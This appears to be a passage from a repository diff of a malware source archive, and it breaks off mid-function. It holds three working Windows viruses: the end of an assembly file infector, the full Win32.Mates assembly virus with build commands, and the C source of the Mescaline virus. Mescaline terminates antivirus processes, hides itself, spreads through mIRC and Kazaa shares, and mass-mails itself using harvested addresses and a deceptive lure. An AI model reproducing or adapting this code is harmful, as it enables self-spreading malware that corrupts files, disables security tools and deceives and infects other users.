push offset szFileName__ ; Pointer to command line string
push 00h ; Pointer to name of executable module
call CreateProcessA
jmp _CloseHandle
virus_exit:
mov [exit_flag],TRUE ; Exit code for all threads
_CloseHandle:
push [dwFileHandle] ; Handle of object to close
call CloseHandle
call infect_drives
cmp [exit_flag],TRUE ; Exit code for all threads?
je _ExitProcess ; Equal? Jump to _ExitProcess
_GetExitCodeProcess:
push offset dwExitCode ; Address to receive termination
; status
push [ProcessInformation.hProcess]
; Handle to the process
call GetExitCodeProcess
cmp [dwExitCode],00h ; No error?
je _CreateProcessA ; Equal? Jump to _CreateProcessA
jmp _GetExitCodeProcess
_CreateProcessA:
push offset ProcessInformation
; Pointer to PROCESS_INFORMATION
push offset StartupInfo ; Pointer to STARTUPINFO
push 00h ; Pointer to current directory name
push 00h ; Pointer to new environment block
push NORMAL_PRIORITY_CLASS ; Creation flags
push 00h ; Handle inheritance flag
push 00h ; Pointer to thread security
; attributes
push 00h ; Pointer to process security
; attributes
mov esi,[lpFileExtension] ; ESI = pointer to file extension
mov byte ptr [esi+04h],' ' ; Store space at end of filename
mov [esi],'EXE.' ; Store file extension
mov [esi+05h],'$$$$' ; Store command-line
push offset szFileName__ ; Pointer to command line string
push 00h ; Pointer to name of executable module
call CreateProcessA
_ExitProcess:
push 00h ; Exit code for all threads
call ExitProcess
_DeleteFileA:
push offset szFileName__ ; Address of name of file to delete
call DeleteFileA
jmp _ExitProcess
infect_drives proc near ; Infect drives
push offset cBuffer_ ; Address of buffer for current
; directory
push nBufferLength ; Size, in characters, of directory
; buffer
call GetCurrentDirectoryA
call infect_directories
mov ecx,04h ; Infect drive C:, D:, E: and F:
set_current_directory_loop:
push ecx ; ECX = counter
push offset szCurDir ; Address of name of new current
; directory
call SetCurrentDirectoryA
call infect_directories
inc byte ptr [szCurDir] ; Increase drive letter
pop ecx ; ECX = counter
loop set_current_directory_loop
push offset szCurDir_ ; Address of name of new current
; directory
call SetCurrentDirectoryA
jmp _FindNextFileA
ret ; Return
endp
infect_directories proc near ; Infect directories
push offset cBuffer__ ; Address of buffer for current
; directory
push nBufferLength ; Size, in characters, of directory
; buffer
call GetCurrentDirectoryA
push offset FindFileData ; Address of returned information
push offset szFileName_ ; Address of name of file to search
; for
call FindFirstFileA
mov [dwSearchHandle],eax ; Store search handle
_FindNextFileA:
push offset FindFileData ; Address of returned information
push [dwSearchHandle] ; Handle of search
call FindNextFileA
or eax,eax ; Function failed?
jz function_failed ; Zero? Jump to function_failed
cmp [FindFileData.cFileName],'.'
; Directory?
je _FindNextFileA ; Equal? Jump to _FindNextFileA
mov eax,[FindFileData.dwFileAttributes]
and eax,FILE_ATTRIBUTE_DIRECTORY
; Directory?
jz _FindNextFileA ; Zero? Jump to _FindNextFileA
push offset szCurDir__ ; Address of name of new current
; directory
call SetCurrentDirectoryA
push offset FindFileData.cFileName
; Address of name of new current
; directory
call SetCurrentDirectoryA
push offset FindFileData ; Address of returned information
push offset szFileName ; Address of name of file to search
; for
call FindFirstFileA
mov [dwSearchHandle_],eax ; Store search handle
cmp eax,INVALID_HANDLE_VALUE
je _FindNextFileA ; Function failed? Jump to
; _FindNextFileA
continue_a_file_search:
or eax,eax ; Function failed?
jz _FindNextFileA ; Zero? Jump to _FindNextFileA
call infect_file
push offset FindFileData ; Address of returned information
push [dwSearchHandle_] ; Handle of search
call FindNextFileA
jmp continue_a_file_search
function_failed:
ret ; Return
endp
infect_file proc near ; Infect file
push FILE_ATTRIBUTE_ARCHIVE ; Address of attributes to set
push offset FindFileData.cFileName
; Address of filename
call SetFileAttributesA
push 00h ; Handle of file with attributes to
; copy
push FILE_ATTRIBUTE_ARCHIVE ; File attributes
push OPEN_EXISTING ; How to create
push 00h ; Address of security descriptor
push FILE_SHARE_READ + FILE_SHARE_WRITE
; Share mode
push GENERIC_READ + GENERIC_WRITE
; Access (read-write) mode
push offset FindFileData.cFileName
; Address of name of the file
call CreateFileA
cmp eax,INVALID_HANDLE_VALUE
je _SetFileAttributesA ; Function failed? Jump to
; _SetFileAttributesA
mov [dwFileHandle],eax ; Store file handle
push 00h ; Address of high-order word for file
; size
push eax ; Handle of file to get size of
call GetFileSize
mov [dwFileSize],eax ; Store low-order doubleword of the
; file size
_CreateFileMappingA:
push eax ; EAX = low-order doubleword of the
; file size
push 00h ; Name of file-mapping object
push eax ; Low-order doubleword of object size
push 00h ; High-order doubleword of object size
push PAGE_READWRITE ; Protection for mapping object
push 00h ; Optional security attributes
push [dwFileHandle]
call CreateFileMappingA
mov [dwMappingHandle],eax ; Store file mapping handle
push 00h ; Low-order doubleword of file offset
push 00h ; High-order doubleword of file offset
push FILE_MAP_WRITE ; Access mode
push eax ; File-mapping object to map into
; address space
call MapViewOfFile
cmp [infect_flag],TRUE ; Infect file?
je infect_file_ ; Equal? Jump to infect_file_
mov esi,eax ; ESI = starting address of the mapped
; view
mov edi,[esi+3ch] ; EDI = offset of new executable (NE,
; LE,etc) header within disk file
cmp dword ptr [esi+edi],'EP'
; Portable Executable (PE)?
jne infect_exit ; Not equal? Jump to infect_exit
cmp [esi+6fh],'3NIW'
je infect_exit ; Equal? Jump to infect_exit
call _UnmapViewOfFile
mov [infect_flag],TRUE ; Infect file
mov eax,[dwFileSize] ; EAX = Low-order doubleword of the
; file size
add eax,VirusSize ; Add size of virus to low-order
; doubleword of the file size
jmp _CreateFileMappingA
infect_file_:
mov [infect_flag],FALSE ; Don't infect file
mov [lpMappedView],eax ; Store starting address of the mapped
; view
push edi esi ecx ; Save registers at stack
pushf ; Save flags at stack
add eax,[dwFileSize] ; Add low-order doubleword of the file
; size to starting address of the
; mapped view
add eax,VirusSize-01h ; Add size of virus minus one to
; starting address of the mapped view
mov edi,eax ; EDI = pointer to last byte of file
mov esi,[lpMappedView] ; ESI = starting address of the mapped
; view
add esi,[dwFileSize] ; Add low-order doubleword of the file
; size to starting address of the
; mapped view
mov ecx,[dwFileSize] ; ECX = low-order doubleword of the
; file size
dec esi ; ESI = pointer to last byte of
; original code
std ; Set direction flag
rep movsb ; Move original code to end of file
mov edi,[lpMappedView] ; EDI = starting address of the mapped
; view
xor eax,eax ; Zero EAX
mov ecx,VirusSize ; Store seven thousand and forty-five
; bytes
cld ; Clear direction flag
rep stosb ; Overwrite the first seven thousand
; and forty-five bytes of original
; code
mov edi,[lpMappedView] ; EDI = starting address of the mapped
; view
lea esi,cBuffer ; ESI = offset of cBuffer
mov ecx,VirusSize ; Move seven thousand and forty-five
; bytes
cld ; Clear direction flag
rep movsb ; Move virus to beginning of file
popf ; Load flags from stack
pop ecx esi edi ; Load registers from stack
infect_exit:
call _UnmapViewOfFile
push offset FindFileData.ftLastWriteTime-08h
; Time the file was last written
push offset FindFileData.ftLastAccessTime-04h
; Time the file was last accessed
push offset FindFileData.ftCreationTime
; Time the file was created
push [dwFileHandle] ; Identifies the file
call SetFileTime
push [dwFileHandle] ; Handle of object to close
call CloseHandle
_SetFileAttributesA:
push [FindFileData.dwFileAttributes]
; Address of attributes to set
push offset FindFileData.cFileName
; Address of filename
call SetFileAttributesA
ret ; Return
endp
_UnmapViewOfFile proc near ; Unmaps a mapped view of a file from
; the calling process's address space
; and close it
push [lpMappedView] ; Address where mapped view begins
call UnmapViewOfFile
push [dwMappingHandle] ; Handle of object to close
call CloseHandle
ret ; Return
endp
code_end:
end code_begin
Win32/Infector/Win32.Mates.asm
+452
View File
@@ -0,0 +1,452 @@
COMMENT#
____________________________________________________________________________________________
...:: Win32.Mates - Virus ::...
- Version 1.0 -
- by DiA /auXnet -
- (c)02 [GermanY] -
____________________________________________________________________________________________
+++++Disclaimer+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+I am NOT responsible for any damage that you do! You can need the code however you want...+
+My motherlanguage is not English, I hope you understand what I mean. +
+Feel FREE to write any Comments to +
+ DiA_hates_machine@gmx.de +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Why the Hell "Mates":
This Virus is written for all my Mates in real life!
How does it work:
- get da real host's name (.SYS)
- create a thread (Virus)
- run Host
Virus->
- start after five sek
- rename found .EXE file to .SYS
- copy itself in .EXE file
- if no more filez in current directory -> cd.. (with my method)
- infect again
- when no more fileZ check counter
- if no payload give full control to host
Payload:
- new counter method (via Get/Set CaretBlinkTime)
- set new caret blink time
- inc it
- 20 starts of da host???
- if yes set new caret blink time (-20) stop the mouse cursor and show a message
- if no inc it again and back to host
Special:
- the counter
- hide da fucking window (with TASM32)
- work with threads
Here comes da 1st geneartion:
;-----MatesSys.asm-----cut------------------------------------------------------------------
.386
.model flat
jumps
extrn MessageBoxA:PROC
extrn ExitProcess:PROC
.data
oTitle db '°°°1st Generation°°°',0
oMsg db 'This is da 1st generation of Win32.Mates - Virus',10,13
db ' by DiA /auXnet',10,13
db 'Have Fun...',0
.code
start:
push 0
push offset oTitle
push offset oMsg
push 0
call MessageBoxA
push 0
call ExitProcess
end start
;---------------------cut-------------------------------------------------------------------
To Compile the Mates - ViruS:
tasm32 /z /ml /m3 Mates,,;
tlink32 -Tpe -c Mates,Mates,, import32.lib
To Compile the Mates - SYS:
tasm32 /z /ml /m3 MatesSys,,;
tlink32 -Tpe -c MatesSys,MatesSys,, import32.lib
rename MatesSys.exe Mates.sys
#
;-------------------------------------------------------------------------------------------
.386
.model flat
jumps
;-----needed API's--------------------------------------------------------------------------
extrn MessageBoxA :PROC
extrn SetConsoleTitleA :PROC
extrn SetCursorPos :PROC
extrn SetCaretBlinkTime :PROC
extrn SetWindowPos :PROC
extrn SetCurrentDirectoryA :PROC
extrn Sleep :PROC
extrn FindWindowA :PROC
extrn FindFirstFileA :PROC
extrn FindNextFileA :PROC
extrn CreateThread :PROC
extrn CloseHandle :PROC
extrn CopyFileA :PROC
extrn CreateProcessA :PROC
extrn GetCommandLineA :PROC
extrn GetCaretBlinkTime :PROC
extrn lstrcpyA :PROC
extrn ExitProcess :PROC
;-------------------------------------------------------------------------------------------
;-----data's for the Virus------------------------------------------------------------------
.data
oTitle db '[Win32.Mates Version 1.0]',0
oMsg db 'I WANNA SAY HELLO TO SOME MATES:',10,13
db ' o DeathRider - Colorado SuckZ, Bitch ;)',10,13
db ' o Herr H. - Smoke together!',10,13
db ' o Danny - Rock ''n Roll',10,13
db ' o Pascal - I need some weed...',10,13
db 'AND ALL THE OTHER FUCKERZ :)',10,13
db 'Ride On and THANX for all',10,13,10,13
db ' greetz DiA /auXnet',0
MyConsoleTitle db '.:.',0
FileMask db '*.EXE',0
WindowHandle dd 0
ThreadHandle dd 0
ThreadID dd 0
FindHandle dd 0
ProcessInfo dd 4 dup (0)
StartupInfo dd 4 dup (0)
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
TargetFile db 200d dup (0)
CreateFile db 200d dup (0)
VirusFile db 200d dup (0)
HostFile db 200d dup (0)
Directory db 200d dup (0)
;-------------------------------------------------------------------------------------------
;-----Rock 'n Roll--------------------------------------------------------------------------
.code
Mates:
;-------------------------------------------------------------------------------------------
;-----hide da window------------------------------------------------------------------------
mov eax,offset MyConsoleTitle
push eax
call SetConsoleTitleA
call Sleep5 ;it suckz without sleep
mov eax,offset MyConsoleTitle
xor ebx,ebx
push eax
push ebx
call FindWindowA
mov dword ptr [WindowHandle],eax
call Sleep5
mov eax,01
xor ebx,ebx
mov edx,20000
push ebx
push eax
push eax
push edx
push edx
push ebx
push dword ptr [WindowHandle]
call SetWindowPos
;-------------------------------------------------------------------------------------------
;-----create a thread (virus)---------------------------------------------------------------
mov eax,offset ThreadID
xor ecx,ecx
mov edx,offset RunMates
call MakeThread
;-------------------------------------------------------------------------------------------
;-----get hostname (.sys) and run it--------------------------------------------------------
call GetCommandLineA ;via command line
mov edx,offset VirusFile
push eax
push edx
call lstrcpyA
mov esi,offset VirusFile ;fuck da "
call GetPoint
add esi,4d
mov dword ptr [esi],00000000h
push offset VirusFile+1
push offset HostFile
call lstrcpyA
mov esi,offset HostFile
call GetPoint
mov dword ptr [esi],5359532Eh ;rename to .SYS
mov eax,offset ProcessInfo
xor ebx,ebx
mov ecx,10h
mov edx,offset StartupInfo
mov edi,offset HostFile
push eax ;run host
push edx
push ebx
push ebx
push ecx
push ebx
push ebx
push ebx
push edi
push edi
call CreateProcessA
Wait4Mates:
jmp Wait4Mates ;wait for da virus
;-------------------------------------------------------------------------------------------
;-----here startz da virus (after 5sek)-----------------------------------------------------
RunMates:
mov eax,5000
push eax ;wait 5sek before run
call Sleep
;-------------------------------------------------------------------------------------------
;-----cd.. with another method--------------------------------------------------------------
mov eax,offset HostFile
mov edx,offset Directory
push offset eax ;copy host name 2 directory
push offset edx
call lstrcpyA
mov esi,offset Directory
call GetPoint
mov edi,esi ;handle it in edi
mov dword ptr [edi],00000000h ;fuck da point
DotDot: ;it workz!
cmp byte ptr [edi],'\'
jz ClearAndSet
cmp byte ptr [edi],':' ;C:\ -> cd.. -> suckz
jz CheckBlink
dec edi
jmp DotDot
ClearAndSet:
inc edi
mov dword ptr [edi],00000000h
sub edi,2
mov eax,offset Directory
push eax
call SetCurrentDirectoryA
;-------------------------------------------------------------------------------------------
;-----infect some filez---------------------------------------------------------------------
mov eax,offset Win32FindData
mov edx,offset FileMask
push eax
push edx
call FindFirstFileA
mov dword ptr [FindHandle],eax
FindNext:
cmp eax,-1 ;error -> cd..
je DotDot
test eax,eax ;no more filez -> cd..
jz DotDot
mov eax,offset TargetFile
mov edx,offset CreateFile
push eax
push edx
call lstrcpyA
mov esi,offset CreateFile
call GetPoint
mov dword ptr [esi],5359532Eh ;rename to .SYS
mov eax,offset CreateFile
mov edx,offset TargetFile
mov ecx,01
call CopyIt
mov eax,offset TargetFile
mov edx,offset VirusFile+1
xor ecx,ecx
call CopyIt
mov eax,offset Win32FindData
push eax ;search more filez
push dword ptr [FindHandle]
call FindNextFileA
jmp FindNext
;-------------------------------------------------------------------------------------------
;-----the funny part ...the payload---------------------------------------------------------
CheckBlink:
call GetCaretBlinkTime ;kewl counter!
mov esi,eax ;handle it in esi
cmp esi,1520
ja Set1499 ;bigger
cmp esi,1500
jb Set1501 ;smaler than 1500 mil sek
GoOn:
cmp esi,1519
jne exit ;exit when not 1519
inc esi
call SetBlink ;inc da counter
mov eax,offset ThreadID
xor ecx,ecx
mov edx,offset Message
call MakeThread ;show a nice message
CursorSleep: ;fuck da cursor
mov eax,666
mov edx,999
push eax
push edx
call SetCursorPos
jmp CursorSleep ;foreva ;)
exit:
inc esi
call SetBlink ;inc da counter
xor eax,eax ;null
push eax
call ExitProcess ;give full control to host
Set1501:
mov esi,1501
call SetBlink
jmp GoOn
Set1499:
mov esi,1499 ;go from start
call SetBlink
jmp exit
ret ;thraedend
;-------------------------------------------------------------------------------------------
;-----Sleep5 procedure----------------------------------------------------------------------
Sleep5:
mov eax,05
push eax
call Sleep
ret
;-------------------------------------------------------------------------------------------
;-----GetPoint procedure--------------------------------------------------------------------
GetPoint:
cmp byte ptr [esi],'.'
jz PointFound
inc esi
jmp GetPoint
PointFound:
ret
;-------------------------------------------------------------------------------------------
;-----MakeThread procedure------------------------------------------------------------------
MakeThread:
push eax
push ecx
push ecx
push edx
push ecx
push ecx
call CreateThread
mov dword ptr [ThreadHandle],eax
push dword ptr [ThreadHandle]
call CloseHandle
ret
;-------------------------------------------------------------------------------------------
;-----Message Thread------------------------------------------------------------------------
Message:
mov eax,offset oTitle
mov edx,offset oMsg
xor ebx,ebx
push ebx
push eax
push edx
push ebx
call MessageBoxA
ret
;-------------------------------------------------------------------------------------------
;-----CopyIt procedure----------------------------------------------------------------------
CopyIt:
push ecx
push eax
push edx
call CopyFileA
ret
;-------------------------------------------------------------------------------------------
;-----SetBlink procedure--------------------------------------------------------------------
SetBlink:
push esi
call SetCaretBlinkTime
ret
;-------------------------------------------------------------------------------------------
end Mates
Win32/Infector/Win32.Maya.4153.asm
+1121
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Maya.asm
+1319
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Mescaline.asm
+657
View File
@@ -0,0 +1,657 @@
/*
Mescaline Virus 2003 DR-EF All Right Reserved
================================================
When Infected File Is Run The Virus Do This Steps:
1) Get Virus Path & Command Line
2) Hide The Virus Process
3) Disable AntiViruses Monitors
4) Active The Payload
5) Go TSR & Infect Any EXE\SCR File After He Closed
6) Execute The Host
7) Modify Mirc To Send The Virus To Chatted Users
8) Infect Every EXE\SCR File In The First Ten Kazaa Shared Dirs
Every 25 Infections The Virus Use MAPI To Mail Himself To Address That
He Found In Temporary HTML Files.
*/
#include &lt;stdafx.h&gt;
#include &lt;stdio.h&gt;
#include &lt;malloc.h&gt;
#include &lt;tlhelp32.h&gt;
#include &lt;shellapi.h&gt;
#include &lt;mapi.h&gt;
const virus_size=49160;
char viruscopyright[]="[Mescaline] Virus (c) 2oo3 DR-EF";
char VirusPath[MAX_PATH],VirusParameters[MAX_PATH],VirusTempFile[MAX_PATH];
tagPROCESSENTRY32 stproc;
char lst[150][MAX_PATH],addbook[300][MAX_PATH],htmfiles[300][MAX_PATH];
int Founded=0,Position;
/*------------------[File Infection Functions]---------------*/
void write_virus(char virus_path[],char WriteTo[],int Virus_Size)
{
FILE *File_Handle;
void *viruscode=malloc(Virus_Size);
File_Handle=fopen(virus_path,"rb");
if(File_Handle!=NULL)
{
fread(viruscode,Virus_Size,1,File_Handle);
fclose(File_Handle);
}
File_Handle=fopen(WriteTo,"wb");
if(File_Handle!=NULL)
{
fwrite(viruscode,Virus_Size,1,File_Handle);
fclose(File_Handle);
}
free(viruscode);
}
void Infect_file(char Virus_path[],char Victim[],char mark[])
{
char temp_file[MAX_PATH],check[sizeof(mark)];
int fsize,mcmp;
FILE *File_Handle;
HANDLE hfile,hfileDT;
DWORD attr;
FILETIME creation,access,change;
WIN32_FIND_DATA ffile;
File_Handle=fopen(Victim,"rb");
hfile=FindFirstFile(Victim,&ffile);
fsize=ffile.nFileSizeLow;
void *data=malloc(ffile.nFileSizeLow);
fread(data,fsize,1,File_Handle);
fseek(File_Handle,(fsize-sizeof(mark)),0);
fread(&check,sizeof(mark),1,File_Handle);
mcmp=memcmp(check,mark,sizeof(mark));
fclose(File_Handle);
if (mcmp!=0)
{
attr=GetFileAttributes(Victim);
SetFileAttributes(Victim,FILE_ATTRIBUTE_NORMAL);
hfileDT=CreateFile(Victim,GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ | FILE_SHARE_WRITE,0,OPEN_EXISTING,0,0);
GetFileTime(hfileDT,&creation,&access,&change);
CloseHandle(hfileDT);
strcpy(temp_file,Victim);
strcat(temp_file,"_I");
write_virus(Virus_path,temp_file,virus_size);
File_Handle=fopen(temp_file,"ab");
fwrite(data,ffile.nFileSizeLow,1,File_Handle);
fwrite(mark,sizeof(mark),1,File_Handle);
fclose(File_Handle);
DeleteFile(Victim);
hfileDT=CreateFile(temp_file,GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ | FILE_SHARE_WRITE,0,OPEN_EXISTING,0,0);
SetFileTime(hfileDT,&creation,&access,&change);
CloseHandle(hfileDT);
CopyFile(temp_file,Victim,true);
SetFileAttributes(Victim,attr);
}
DeleteFile(temp_file);
free(data);
FindClose(hfile);
}
int Run_Infected_File(char File[],char Parm[],int Virus_Size)
{
FILE *hfile;
HANDLE h_file;
WIN32_FIND_DATA ffile;
int host_size,is_end=0;
void *data;
h_file=FindFirstFile(File,&ffile);
host_size=(ffile.nFileSizeLow-Virus_Size);
hfile=fopen(File,"rb");
if(hfile!=NULL)
{
data=malloc(host_size);
fseek(hfile,Virus_Size,SEEK_SET);
fread(data,host_size,1,hfile);
fclose(hfile);
}
char temp_file[MAX_PATH],cmd[MAX_PATH];
strcpy(temp_file,File);
strcat(temp_file,"_v");
if(GetFileAttributes(temp_file) != -1 && DeleteFile(temp_file) == 0)
{ // ^-&gt; Check If The File Executed Before.
strcat(temp_file," ");
strcat(temp_file,Parm);
free(data);
FindClose(h_file);
WinExec(temp_file,1);
return(1);
}
hfile=fopen(temp_file,"wb");
if(hfile!=NULL)
{
fwrite(data,host_size,1,hfile);
fclose(hfile);
}
free(data);
FindClose(h_file);
SetFileAttributes(temp_file,FILE_ATTRIBUTE_HIDDEN);
strcpy(cmd,temp_file);
if (strlen(Parm) &gt; 0 )
{
strcat(cmd," ");
strcat(cmd,Parm);
}
WinExec(cmd,1);
SleepEx(500,0);
do
{
is_end=DeleteFile(temp_file);
}
while(is_end!=1);
return(1);
}
/*------------------------[Misc Functions]---------------------*/
void PayLoad()
{
SYSTEMTIME time;
GetSystemTime(&time);
if ((time.wHour==0)==1)
{
MessageBox(NULL,"Have You Ever Had The Feeling\nThat You Not Sure If We Wake Or Still Dreaming...\nIt's Call Mescaline\nIt's The Only Way To Fly...",viruscopyright,MB_ICONINFORMATION);
for(int i=1;i&lt;9999;i++)
SetWindowText((HWND)(i),viruscopyright);
}
}
void AntiAV()
{
HANDLE hsnp,hproc;
char MayBeAV[MAX_PATH];
tagPROCESSENTRY32 proc;
hsnp=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
proc.dwSize=sizeof(proc);
Process32First(hsnp,&proc);
do
{
strcpy(MayBeAV,proc.szExeFile);
strlwr(MayBeAV);
if(strstr(MayBeAV,"anti") != 0 || strstr(MayBeAV,"avp") != 0 ||
strstr(MayBeAV,"rav") != 0 || strstr(MayBeAV,"nav") != 0 ||
strstr(MayBeAV,"troj") != 0 || strstr(MayBeAV,"scan") != 0 ||
strstr(MayBeAV,"viru") != 0 || strstr(MayBeAV,"safe") != 0)
{
hproc=OpenProcess(0,FALSE,proc.th32ProcessID);
TerminateProcess(hproc,666);
CloseHandle(hproc);
}
}
while(Process32Next(hsnp,&proc));
CloseHandle(hsnp);
}
void InitVirus()
{
char *cmd,kernel_path[MAX_PATH];
int pos=0;
HMODULE krnl;
FARPROC RSP;
cmd=GetCommandLine();
cmd++;
do
{
VirusPath[pos]=(*cmd);
pos++;
*cmd++;
}
while((*cmd) != '"');
cmd++;
if ((*cmd) != 0)
{
cmd++;
pos=0;
while((*cmd) != NULL)
{
VirusParameters[pos]=(*cmd);
cmd++;
pos++;
}
}
GetTempPath(MAX_PATH,VirusTempFile);
strcat(VirusTempFile,"Mescaline.exe");
GetSystemDirectory(kernel_path,MAX_PATH);
strcat(kernel_path,"\\Kernel32.dll");
krnl=LoadLibrary(kernel_path);
if (krnl != NULL)
{
RSP=GetProcAddress(krnl,"RegisterServiceProcess");
if (RSP != NULL)
{
__asm
{
push 01h
push 00h
call RSP
}
}
}
FreeLibrary(krnl);
AntiAV();
}
void IRC()
{
char mirc[MAX_PATH],File[MAX_PATH];
FILE *hfile;
strcpy(mirc,"C:\\Program Files\\mIRC\\");
strcpy(File,mirc);
strcat(File,"mirc.ini");
if(GetFileAttributes(File)!=-1)
{
WritePrivateProfileString("rfiles","n2","mirc.dll",File);
strcpy(File,mirc);
strcat(File,"hi.scr");
CopyFile(VirusPath,File,false);
strcpy(File,mirc);
strcat(File,"mirc.dll");
hfile=fopen(File,"w");
if(hfile!=NULL)
{
fprintf(hfile,"on 1:join:#: { if ( $nick == $me ) halt\n");
fprintf(hfile,"else /dcc send $nick %shi.scr }",mirc);
fclose(hfile);
}
}
}
BOOL IsInfectable(char filename[])
{
char last[3];
int i;
for(i=1;i&lt;(int)strlen(filename);i++)
{
last[0]=filename[i-2];
last[1]=filename[i-1];
last[2]=filename[i];
}
strlwr(last);
if(memcmp(last,"exe",3)==0 || memcmp(last,"scr",3)==0)
{
return(TRUE);
}
return(FALSE);
}
int Sucker2Sucker()
{
HKEY hkey;
int RetValue,i,num;;
unsigned char share[MAX_PATH];
unsigned long Sshare=sizeof(share);
char search[MAX_PATH],path[MAX_PATH],full[MAX_PATH],text[3];
HANDLE hfile;
WIN32_FIND_DATA hfind;
RetValue=RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\LocalContent",0,KEY_QUERY_VALUE,&hkey);
if(RetValue != ERROR_SUCCESS)
return(1);
strcpy(search,"");
for(num=48;num!=58;num++)
{
text[0]='d';
text[1]='i';
text[2]='r';
text[3]=num;
for(i=0;i!=4;i++)
search[i]=text[i];
for(i=4;i!=MAX_PATH;i++)
search[i]=NULL;
RetValue=RegQueryValueEx(hkey,search,0,NULL,share,&Sshare);
if(RetValue == ERROR_SUCCESS)
{
for(i=7;i&lt;MAX_PATH;i++)
path[i-7]=share[i];
strcpy(search,path);
strcat(path,"\\*.*");
hfile=FindFirstFile(path,&hfind);
if (hfile != INVALID_HANDLE_VALUE)
{
do
{
strcpy(full,search);
strcat(full,"\\");
strncat(full,hfind.cFileName,sizeof(hfind.cFileName));
if(IsInfectable(full)==TRUE && strlen(full)&gt;10)
Infect_file(VirusPath,full,"Ml");
}
while(FindNextFile(hfile,&hfind));
FindClose(hfile);
}
}
}
RegCloseKey(hkey);
return(1);
}
/*-----------------------[Mapi Worm]----------------------*/
int worming()
{
char mapidll[MAX_PATH];
LPSTR mail_msg="Secret Password,Data,Information Can Be Found Here !!!\nIn This e-mail you can find a lot of secret info\nlike password to web servers and documentation about hacking\nlike 'how to hack web server.txt',or 'How To crack ZIP archive.doc'\n(all documents are in the HackInfo.exe compressed package)\nif you like such stuff you can free register in our web site:\nwww.BestHackersOfTheWorld.com and you will get every week a new\npackage,like the one in the attachment,for free !!!\n\nif you don't want to get mail like this any more please send\n\ta blank e-mail to : BestHackers@dREF.com\n\nand if you want to support us send this mail without any\nchanging to other people that you know.\n\tThank You For Reading This Mail.";
GetSystemDirectory(mapidll,MAX_PATH);
strcat(mapidll,"\\mapi32.dll");
HMODULE MapiModule;
MapiModule=LoadLibrary(mapidll);
__asm
mov eax,01h ; Fix An Expection With The Msoe.dll library
if(MapiModule==NULL)
return(1);
FARPROC SendMail,LogOn,LogOff;
MapiFileDesc mfile;
MapiMessage msg;
MapiRecipDesc rec;
SendMail=GetProcAddress(MapiModule,"MAPISendMail");
LogOn=GetProcAddress(MapiModule,"MAPILogon");
LogOff=GetProcAddress(MapiModule,"MAPILogoff");
LHANDLE MapiSession;
if((LogOn == NULL) || (LogOff == NULL) || (SendMail == NULL))
{
FreeLibrary(MapiModule);
return(1);
}
int retvalue,i;
__asm /* MapiLogOn */
{
lea eax,MapiSession
push eax ;lplhSession
push 00h ;ulReserved
push 00h ;flFlags
push 00h ;lpszPassword
push 00h ;lpszProfileName
push 00h ;ulUIParam
call LogOn
mov retvalue,eax
}
if (retvalue != SUCCESS_SUCCESS)
{
FreeLibrary(MapiModule);
return(1);
}
for(i=1;i&lt;Founded;i++)
{
mfile.lpszPathName=VirusPath;
mfile.lpszFileName="HackInfo - Package1.exe";
mfile.nPosition=-1;
mfile.ulReserved=0;
rec.ulRecipClass=MAPI_TO;
rec.lpszName=addbook[i];
rec.ulReserved=0;
msg.nFileCount=1;
msg.lpszNoteText=mail_msg;
msg.lpszSubject="Best Hackers Teaching You How To Be Hacker !!!";
msg.ulReserved=0;
msg.nRecipCount=1;
msg.lpFiles=&mfile;
msg.lpRecips=&rec;
__asm /* MapiSendMail */
{
push 00h ;ulReserved
push 00h ;flFlags
lea eax,msg
push eax ;lpMessage
push 00h ;ulUIParam
push MapiSession ;lhSession
call SendMail
mov retvalue,eax
}
if (retvalue != SUCCESS_SUCCESS)
{
FreeLibrary(MapiModule);
return(1);
}
}
__asm /* MAPILogoff */
{
push 00h ;ulReserved
push 00h ;flFlags
push 00h ;ulUIParam
push MapiSession;lhSession
call LogOff
}
FreeLibrary(MapiModule);
return(1);
}
void FindFilesAndMails(char where[])
{
char path[MAX_PATH],fullpath[MAX_PATH],buffer[100],mailbuffer[100];
int i=0;
BOOL already_have;
FILE *hfiles;
size_t size;
strcpy(path,where);
strcat(path,"*.*");
WIN32_FIND_DATA find;
HANDLE hfile;
hfile=FindFirstFile(path,&find);
if (hfile != NULL)
{
do
{
strcpy(fullpath,where);
strcat(fullpath,find.cFileName);
strlwr(find.cFileName);
if (find.dwFileAttributes==(FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_DIRECTORY))
{
if ((strcmp(find.cFileName,".") != 0) || (strcmp(find.cFileName,"..") != 0))
{
strcat(fullpath,"\\");
FindFilesAndMails(fullpath);
}
}
if (strstr(find.cFileName,"ht") != 0)
{
hfiles=fopen(fullpath,"rt");
if (hfiles!=NULL)
{
do
{
already_have=FALSE;
strcpy(mailbuffer,"");
size=fread(&buffer,sizeof(buffer),1,hfiles);
strlwr(buffer);
char *temp=strstr(buffer,"mailto:");
if (temp!=NULL)
{
temp=temp+7;
for(i=0;(i&lt;=MAX_PATH)&&(*temp!='"')&&(*temp!='?')&&(*temp!='&lt;');i++,temp++)
mailbuffer[i]=*temp;
mailbuffer[i]=NULL;
if((strstr(mailbuffer,"@")!=NULL) && strlen(mailbuffer)&lt;30)
if (Founded &lt; 299)
{
for(i=1;i&lt;=Founded;i++)
if(strcmp(addbook[i],mailbuffer)==0)
already_have=TRUE;
if(already_have==FALSE)
{
Founded++;
strcpy(addbook[Founded],mailbuffer);
}
}
}
}while(size);
fclose(hfiles);
}
}
}
while(FindNextFile(hfile,&find));
FindClose(hfile);
}
}
void Active_Worm()
{
unsigned char GetValue[MAX_PATH];
unsigned long GetSize=sizeof(GetValue);
char fullpath[MAX_PATH],dir[MAX_PATH];
int i,p=0,x=0;
GetWindowsDirectory(dir,MAX_PATH);
strcat(dir,"\\Temporary Internet Files\\");
FindFilesAndMails(dir);
HKEY hkey;
RegOpenKeyEx(HKEY_CURRENT_USER,"Identities",KEY_QUERY_VALUE,0,&hkey);
strcpy(fullpath,"Identities\\");
x=RegQueryValueEx(hkey,"Default User ID",0,NULL,GetValue,&GetSize);
if (x==0)
{
